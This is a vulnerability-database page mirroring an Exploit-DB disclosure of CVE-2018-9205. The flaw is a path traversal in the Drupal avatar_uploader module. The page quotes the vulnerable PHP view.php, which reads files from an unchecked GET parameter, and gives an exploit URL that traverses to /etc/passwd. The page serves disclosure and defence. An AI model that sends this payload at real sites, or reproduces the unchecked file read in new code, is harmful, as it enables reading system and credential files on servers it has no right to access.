Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure

🗓️ 23 Apr 2018 00:00:00Reported by Larry W. CashdollarType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 43 Views

Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure by Larry W. Cashdollar on 2018-03-3

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download Vulnerability
22 Apr 201800:00
zdt
ATTACKERKB		CVE-2018-9205
4 Apr 201815:29
attackerkb
Circl		CVE-2018-9205
23 Dec 202400:00
circl
CNVD		Drupal avatar_uploader arbitrary file download vulnerability
9 Apr 201800:00
cnvd
CVE		CVE-2018-9205
4 Apr 201815:00
cve
Cvelist		CVE-2018-9205
4 Apr 201815:00
cvelist
Dsquare		Drupal Avatar Uploader File Disclosure
19 May 201800:00
dsquare
exploitpack		Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
23 Apr 201800:00
exploitpack
Nuclei		Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion
27 May 202600:33
nuclei
NVD		CVE-2018-9205
4 Apr 201815:29
nvd
Rows per page
#Title: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
#Author: Larry W. Cashdollar
#Date: 2018-03-30
#CVE-ID: CVE-2018-9205
#Download Site: https://www.drupal.org/project/avatar_uploader
#Vendor: https://www.drupal.org/u/robbinzhao
#Vendor Notified: 2018-04-02
#Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
#Advisory: http://www.vapidlabs.com/advisory.php?v=202

#Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
#Vulnerability:
#The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory:

<?php

$file = $_GET['file'];

echo file_get_contents("uploadDir/$file");
exit;

Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Apr 2018 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.81446
drupalavatar uploaderarbitrary file disclosurecve-2018-9205simple ajax uploadervendor notified
43